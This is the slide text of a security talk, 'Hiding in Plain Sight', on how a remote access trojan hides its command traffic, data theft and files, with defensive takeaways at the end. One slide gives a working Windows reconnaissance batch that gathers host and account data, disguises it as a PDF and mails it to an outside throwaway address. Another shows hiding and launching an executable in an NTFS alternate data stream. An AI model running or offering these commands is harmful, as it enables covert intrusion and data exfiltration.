Hiding in Plain Sight

Presented by / Rob Gillen @argodev

This work is licensed under a .

This talk and related resources are available online:

Creative Commons Attribution 4.0 International License

https://github.com/argodev/talks/

DisclaimerThe content of this presentation represents my personal viewsand thoughts at the present time. I reserve the right to changemy views and opinions at any time. This content is not endorsedby, or representative in any way of my employer nor is itintended to be a view into my work or a reflection on the typeof work that I or my group performs. It is simply a hobby andpersonal interest and should be considered as such.

HTDCSHelpdesk Ticket Driven Cyber Security

Overview

RAT DesignEncryptionCommand/Control (C2)AntiVirusBehavior

RAT DesignExe is dropped via infected pageQueries web page for commandsPerforms commands if not done previouslyPeriodically polls for new commands

EncryptionComplex Encryption is trivialPBKDF – Scrypt sequential memory-hard functionMany iterations (> 10K)Long key-lengths

Encryption ExampleAbove configuration is custom-hardware resistantTakes approximately ¼ second per guess

Command/ControlUse Web2C ApproachCommands are “issued” en masse via normal, benign lookingweb pagesCommon portsLeverages existing HTML/server constructs

Command Text

ipconfig /all > %APPDATA%\info.txtnet start >> %APPDATA%\info.txttasklist /v >> %APPDATA%\info.txtnet user >> %APPDATA%\info.txtnet localgroup administrators >> %APPDATA%\info.txtnetstat -ano >> %APPDATA%\info.txtnet use >> %APPDATA%\info.txtcopy %APPDATA%\info.txt %APPDATA%\output.pdfdel %APPDATA%\info.txt

sendmail %APPDATA%\output.pdf Status Update “Jones, William E. wejones@yourorg.gov” itebaffe-836@yopmail.com smtp.yourorg.gov

del %APPDATA%\output.pdf

Mimic User BehaviorTraffic RatesMonitor incoming/outgoing network traffic for X daysConfigure xfil to stay within X% of “normal”

C2Exponential/randomized stand-downOnly comm during periods of activity

Mimic User BehaviorTarget URLsMonitor outgoing web queries/URLs for X daysUse similar domain names for malicious trafficAppend similar/same query strings to malicious requests

Hiding in Logs

v-client-5b.sjc.dropbox.comsnt-re3-9a.sjc.dropbox.comyn-in-f125.1e100.netl1.ycs.vip.dcb.yahoo.comsnt-re3-9a.sjc.drpbox.comip-69-31-29-228.nlayer.neta23-47-20-211.deploy.static.akamaitechnologies.coml3.ycs.vip.dcb.yahoo.comir2.fp.vip.bf1.yahoo.comwww.nbcnews.com.edgesuite.netwac.946A.edgecastcdn.neta2.twimg.com

Other Hiding TechniquesOffice File content embeddingCreative locationAlternate Data StreamsLeast Significant BitNetwork Protocol Manipulation

Creative File Locations

Alternate Data StreamsFeature of NTFS since NT 3.5.1Used for metadata and compatibility with other file systems

So What?

#notepad pcast-nitrd-report-2010.pdf:secret.txt

What about this?

#type evil.exe > notepad.exe:evil.exe

#start notepad.exe:evil.exe

Crude Image Stego: LSBLeast Significant Bit – alter it and encode message acrossLSB through various bytesVisually imperceptibleComputationally challenging to detectEncryption also an option

LSB: How It Works

Carrier ImageImage Data:Size: 2.1 MBDimensions: 3500 x 2343 pxResolution: 300 dpiBit Depth: 24~ 8 Megapixel

“Secret” Message: Welcome! Remember, things aren’t always what they seem.

LSB Blow Up

Network Protocol Abuse

Challenges of Signature-Based Tools

Next StepsKnow what you can and can’t seeConsider implications of your monitoring strategyBehavior *must* play a role

Questions/ContactRob Gillenrob@gillenfamily.nethttp://rob.gillenfamily.net@argodev

This talk and related resources are available online:https://github.com/argodev/talks/